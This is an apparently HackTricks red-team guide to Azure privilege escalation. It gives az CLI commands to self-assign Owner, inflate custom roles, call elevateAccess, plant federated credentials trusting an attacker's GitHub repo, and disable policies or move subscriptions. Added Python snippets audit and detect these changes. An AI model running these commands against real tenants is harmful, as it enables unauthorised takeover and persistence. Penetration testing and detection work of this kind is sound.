Az - Azure IAM Privesc (Authorization)

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Azure IAM

For more information check:

Az - Entra ID (AzureAD) & Azure IAM

Permissions that let a principal change authorization itself are usually privesc primitives. They are especially dangerous when granted at management group or subscription scope, because child resources inherit them.

Microsoft.Authorization/roleAssignments/write

This permission allows creating role assignments at a given scope, so an attacker can escalate privileges by assigning a more powerful role to themselves or to another controlled principal.

Typical flow:

# Login and confirm current context
az login
az account show

# Enumerate current assignments and find the custom role granting this action
az role assignment list --all --output table
az role definition list --name "<role-definition-name>"

If the compromised principal holds this action at some scope, it can directly grant a privileged role such as Owner, Contributor or Key Vault Secrets Officer, or any other built-in/custom role available in that scope:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Knowing the principal object ID of the target user/service principal/managed identity is enough to grant the new role. This can be used for self-privesc, lateral movement or persistence by assigning the role to another controlled principal.

Microsoft.Authorization/roleDefinitions/write

This permission allows creating or modifying custom role definitions. In practice this is dangerous because an attacker can:

  • Modify a custom role that is already assigned to the compromised principal, so the new permissions take effect immediately.
  • Create a new over-privileged custom role and assign it afterwards, usually chained with Microsoft.Authorization/roleAssignments/write.

Typical flow:

# Find the current assignments
az role assignment list --all --output table

# Review the role definition currently assigned to the compromised principal
az role definition list --name "<role-definition-name>"
{
  "roleName": "<name of the role>",
  "Name": "<name of the role>",
  "IsCustom": true,
  "Description": "Custom role with elevated privileges",
  "Actions": ["*"],
  "NotActions": [],
  "DataActions": ["*"],
  "NotDataActions": [],
  "AssignableScopes": ["/subscriptions/<subscription-id>"],
  "id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>"
}

Then update the role permissions using the previous definition by calling:

az role definition update --role-definition role.json

If the modified role is already assigned to the attacker, this is faster than creating a new role assignment, because the permission inflation applies to the existing assignment.
If the attacker only has roleDefinitions/write, they can still weaponize it by modifying roles that are already assigned to compromised principals.
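An added audit helper (not code from the page or from Azure) that evaluates a role.json of the shape shown above the way a defender would before or after an update: it resolves Actions minus NotActions with Azure-style wildcards, flags authorization-plane actions, DataActions wildcards and broad AssignableScopes, and reports the permission inflation between two versions of the same custom role. The role snapshots and subscription id are constructed.

```python
from fnmatch import fnmatchcase

# Authorization-plane actions from this page; a role that grants any of them can rewrite RBAC or policy state.
SENSITIVE_ACTIONS = [
    "Microsoft.Authorization/roleAssignments/write",
    "Microsoft.Authorization/roleDefinitions/write",
    "Microsoft.Authorization/elevateAccess/action",
    "Microsoft.Authorization/policyAssignments/write",
    "Microsoft.Authorization/policyAssignments/delete",
    "Microsoft.Authorization/policyDefinitions/write",
    "Microsoft.Management/managementGroups/write",
    "Microsoft.Management/managementGroups/subscriptions/write",
    "Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write",
]

def matches(action, patterns):
    """Azure-style wildcard match: '*' in a pattern spans path segments, comparison is case-insensitive."""
    return any(fnmatchcase(action.lower(), p.lower()) for p in patterns)

def grants(role, action):
    """Effective check for one role definition: Actions grant, NotActions subtract."""
    return matches(action, role.get("Actions", [])) and not matches(action, role.get("NotActions", []))

def audit_role(role):
    """Findings for a role.json in the shape listed above (the file passed to `az role definition update`)."""
    findings = [a for a in SENSITIVE_ACTIONS if grants(role, a)]
    if "*" in role.get("DataActions", []):
        findings.append("DataActions wildcard (*)")
    findings += [f"assignable at broad scope {s}" for s in role.get("AssignableScopes", []) if "/resourcegroups/" not in s.lower()]
    return findings

def inflated(old, new):
    """Sensitive actions the updated definition grants that the previous version did not."""
    return [a for a in SENSITIVE_ACTIONS if grants(new, a) and not grants(old, a)]

# Constructed before/after snapshots of one custom role (the 'after' mirrors the page's listing).
BEFORE = {"Name": "app-deployer", "IsCustom": True, "Actions": ["Microsoft.Compute/*", "Microsoft.Authorization/*/read"],
          "NotActions": [], "DataActions": [], "NotDataActions": [],
          "AssignableScopes": ["/subscriptions/00000000-0000-0000-0000-000000000001/resourceGroups/rg1"]}
AFTER = {"Name": "app-deployer", "IsCustom": True, "Actions": ["*"],
         "NotActions": ["Microsoft.Authorization/elevateAccess/action"], "DataActions": ["*"], "NotDataActions": [],
         "AssignableScopes": ["/subscriptions/00000000-0000-0000-0000-000000000001"]}
```

Running `inflated(BEFORE, AFTER)` lists every sensitive action the update introduced except the one excluded through NotActions, which is the signal a roleDefinitions/write alert should carry.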

Microsoft.Authorization/elevateAccess/action

This permission allows elevating privileges and becoming able to assign permissions over Azure resources to any principal. It is designed to be granted to Entra ID Global Administrators so they can also manage permissions on Azure resources.

Tip

I think the user needs to be a Global Administrator in Entra ID for the elevate call to work.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<object-id>" --role "Owner" --scope "/"

Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write

This permission allows creating/updating Federated Identity Credentials (FICs) on user-assigned managed identities. In practice it lets an attacker add a new trust relationship to an external identity provider and then obtain tokens as that managed identity.

This is a persistence / identity hijacking primitive: if the managed identity already has access to Azure resources, the attacker only needs to create a matching external workload (for example, a GitHub Actions workflow) and then exchange the external token for Azure tokens.

Before abusing it, it is useful to confirm the following:

  • Which managed identity can be modified
  • The scopes/roles already assigned to that managed identity
  • Which issuer, subject and audience will be accepted at token exchange time

You can create the FIC with the dedicated CLI command:

az identity federated-credential create \
--name "github-federated-identity" \
--identity-name testMI \
--resource-group bialystok-rg \
--issuer "https://token.actions.githubusercontent.com" \
--subject "repo:REPO/IAMTEST:ref:refs/heads/main" \
--audiences "api://AzureADTokenExchange"

Or with raw REST.

Example commands that let a GitHub repo authenticate as the managed identity:

# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'

# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'

Once the FIC is created, the attacker can authenticate from the external workload and use the permissions the managed identity already holds in Azure. For more information about abusing GitHub OIDC / workload identity check:

Az Federation Abuse
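An added inventory check (not code from the page or from Azure) for the FIC properties shape used in the REST body above: it compares every credential on a user-assigned managed identity against a baseline of expected (issuer, subject) pairs, the standard token-exchange audience, and a trusted GitHub org, so an unexpected trust relationship like the one created above stands out. The identity name, org names, repos and baseline are constructed assumptions.

```python
import re

GITHUB_ISSUER = "https://token.actions.githubusercontent.com"
TOKEN_EXCHANGE_AUDIENCE = "api://AzureADTokenExchange"
# Assumptions for this constructed tenant: which issuers are expected and which GitHub org owns the workloads.
EXPECTED_ISSUERS = {GITHUB_ISSUER}
TRUSTED_GITHUB_ORGS = {"contoso-example"}
GITHUB_SUBJECT = re.compile(r"^repo:(?P<org>[^/]+)/(?P<repo>[^:]+):(?P<claim>.+)$")

def audit_fic(name, fic, baseline):
    """Findings for one FIC (same shape as the REST body above); baseline = set of (issuer, subject) expected here."""
    p = fic["properties"]
    findings = []
    if p["issuer"] not in EXPECTED_ISSUERS:
        findings.append(f"{name}: unexpected issuer {p['issuer']}")
    if p.get("audiences") != [TOKEN_EXCHANGE_AUDIENCE]:
        findings.append(f"{name}: non-standard audience {p.get('audiences')}")
    if (p["issuer"], p["subject"]) not in baseline:
        findings.append(f"{name}: subject {p['subject']} not in baseline (new trust relationship)")
    if p["issuer"] == GITHUB_ISSUER:
        m = GITHUB_SUBJECT.match(p["subject"])
        if not m:
            findings.append(f"{name}: unparseable GitHub subject {p['subject']}")
        elif m["org"] not in TRUSTED_GITHUB_ORGS:
            findings.append(f"{name}: repo {m['org']}/{m['repo']} belongs to an untrusted org")
    return findings

def audit_identity(identity, fics, baseline):
    """Run audit_fic over every FIC attached to one user-assigned managed identity."""
    return [f for name, fic in fics.items() for f in audit_fic(name, fic, baseline)]

# Constructed: two FICs on one identity; only the first is in the baseline.
FICS = {
    "github-federated-identity": {"properties": {"issuer": GITHUB_ISSUER,
        "subject": "repo:contoso-example/deploy:ref:refs/heads/main", "audiences": [TOKEN_EXCHANGE_AUDIENCE]}},
    "CustomGH2": {"properties": {"issuer": GITHUB_ISSUER,
        "subject": "repo:unknown-org/anything:ref:refs/heads/main", "audiences": [TOKEN_EXCHANGE_AUDIENCE]}},
}
BASELINE = {(GITHUB_ISSUER, "repo:contoso-example/deploy:ref:refs/heads/main")}
```

Feed it the `federatedIdentityCredentials` objects returned by the REST API (or `az identity federated-credential list`) per identity; anything outside the baseline is a credential to investigate and remove.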

Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete

An attacker with the Microsoft.Authorization/policyAssignments/write or Microsoft.Authorization/policyAssignments/delete permission at management group, subscription or resource group scope can modify or delete Azure policy assignments, potentially disabling security restrictions that block specific operations.

This can give access to resources or capabilities that were previously protected by the policy.

Delete a policy assignment:

az policy assignment delete \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Disable a policy assignment:

# DoNotEnforce keeps the assignment in place but stops it from blocking non-compliant requests
az policy assignment update \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
--enforcement-mode DoNotEnforce

Verify the changes:

# List policy assignments
az policy assignment list \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

# Show specific policy assignment details
az policy assignment show \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Microsoft.Authorization/policyDefinitions/write

An attacker with the Microsoft.Authorization/policyDefinitions/write permission can modify Azure policy definitions, changing the rules that control security restrictions across the whole environment.

For example, a policy that restricts the regions allowed when creating resources can be modified to allow any region, or the policy effect can be changed so the policy has no effect.

Modify a policy definition:

az policy definition update \
--name "<policyDefinitionName>" \
--rules @updated-policy-rules.json

Verify the changes:

az policy definition list --output table

az policy definition show --name "<policyDefinitionName>"

Microsoft.Management/managementGroups/write

An attacker with the Microsoft.Management/managementGroups/write permission can modify the management group hierarchy or create new management groups, potentially evading restrictive policies applied at higher levels.

For example, the attacker can create a new management group without restrictive policies and then move subscriptions into it.

Create a new management group:

az account management-group create \
--name "yourMGname" \
--display-name "yourMGDisplayName"

Modify the management group hierarchy:

az account management-group update \
--name "<managementGroupId>" \
--parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"

Verify the changes:

az account management-group list --output table

az account management-group show \
--name "<managementGroupId>" \
--expand

Microsoft.Management/managementGroups/subscriptions/write

An attacker with the Microsoft.Management/managementGroups/subscriptions/write permission can move subscriptions between management groups, potentially bypassing restrictive policies by moving a subscription into a group with fewer or no policies.

Move a subscription to a different management group:

az account management-group subscription add \
--name "<managementGroupName>" \
--subscription "<subscriptionId>"

Verify the changes:

az account management-group subscription show \
--name "<managementGroupId>" \
--subscription "<subscriptionId>"
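An added detection example (not code from the page or from Azure) covering the operations this page walks through: roleAssignments/write, elevateAccess/action, policyAssignments/delete and write, and managementGroups/subscriptions/write. It classifies the scope each Activity Log record touches and raises a finding for privileged role assignments, authorization writes at tenant/management group/subscription scope, disabled policy enforcement and subscription moves. The records are constructed and simplified (real Activity Log entries nest these fields and carry the request body as a JSON string); the Owner and User Access Administrator role ids are Microsoft's documented built-in values.

```python
import re

# Built-in role ids (documented Microsoft values) whose assignment is itself an authorization change.
PRIVILEGED_ROLE_IDS = {"8e3af657-a8ff-443c-a75c-2fe8c4bcb635": "Owner",
                       "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9": "User Access Administrator"}

def scope_breadth(resource_id):
    # Strip the /providers/Microsoft.Authorization/... suffix and classify the remaining scope.
    scope = re.split(r"/providers/microsoft\.authorization/", resource_id, flags=re.I)[0].lower() or "/"
    if scope == "/":
        return "tenant"
    if scope.startswith("/providers/microsoft.management/managementgroups/"):
        return "managementGroup"
    return "resourceGroupOrBelow" if "/resourcegroups/" in scope else "subscription"

def analyze(rec):
    """One finding per simplified Activity Log record, or None if the event is not one this page warns about."""
    op, breadth, who = rec["operationName"], scope_breadth(rec["resourceId"]), rec["caller"]
    props = rec.get("requestBody", {}).get("properties", {})
    if op == "Microsoft.Authorization/elevateAccess/action":
        return f"CRITICAL elevateAccess called by {who}"
    if op == "Microsoft.Authorization/roleAssignments/write":
        role = PRIVILEGED_ROLE_IDS.get(props.get("roleDefinitionId", "").rsplit("/", 1)[-1].lower())
        if role or breadth != "resourceGroupOrBelow":  # privileged role anywhere, or any role at a broad scope
            return f"HIGH {role or 'role'} assigned at {breadth} scope by {who}"
    elif op == "Microsoft.Authorization/policyAssignments/delete":
        return f"HIGH policy assignment deleted at {breadth} scope by {who}"
    elif op == "Microsoft.Authorization/policyAssignments/write" and props.get("enforcementMode") == "DoNotEnforce":
        return f"HIGH policy enforcement disabled at {breadth} scope by {who}"  # CLI --enforcement-mode DoNotEnforce
    elif op == "Microsoft.Management/managementGroups/subscriptions/write":
        return f"MEDIUM subscription moved under {rec['resourceId']} by {who}"
    return None

def triage(records):
    return [f for f in map(analyze, records) if f]

SUB = "/subscriptions/00000000-0000-0000-0000-000000000001"   # constructed ids throughout
MG = "/providers/Microsoft.Management/managementGroups/corp"
AUTHZ = "/providers/Microsoft.Authorization/"
SAMPLE_RECORDS = [
    {"operationName": "Microsoft.Authorization/roleAssignments/write", "caller": "dev@contoso.example",
     "resourceId": f"{SUB}{AUTHZ}roleAssignments/a1",
     "requestBody": {"properties": {"roleDefinitionId": f"{SUB}{AUTHZ}roleDefinitions/8e3af657-a8ff-443c-a75c-2fe8c4bcb635"}}},
    {"operationName": "Microsoft.Authorization/roleAssignments/write", "caller": "dev@contoso.example",
     "resourceId": f"{SUB}/resourceGroups/rg1/providers/Microsoft.Storage/storageAccounts/sa1{AUTHZ}roleAssignments/a2",
     "requestBody": {"properties": {"roleDefinitionId": f"{SUB}{AUTHZ}roleDefinitions/11111111-1111-1111-1111-111111111111"}}},
    {"operationName": "Microsoft.Authorization/policyAssignments/write", "caller": "dev@contoso.example",
     "resourceId": f"{MG}{AUTHZ}policyAssignments/deny-public-ip", "requestBody": {"properties": {"enforcementMode": "DoNotEnforce"}}},
    {"operationName": "Microsoft.Authorization/elevateAccess/action", "caller": "ga@contoso.example",
     "resourceId": f"{AUTHZ}elevateAccess", "requestBody": {}},
]
```

The second record (a non-privileged role at resource scope) deliberately produces no finding, which keeps the rule from paging on routine resource-level assignments.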
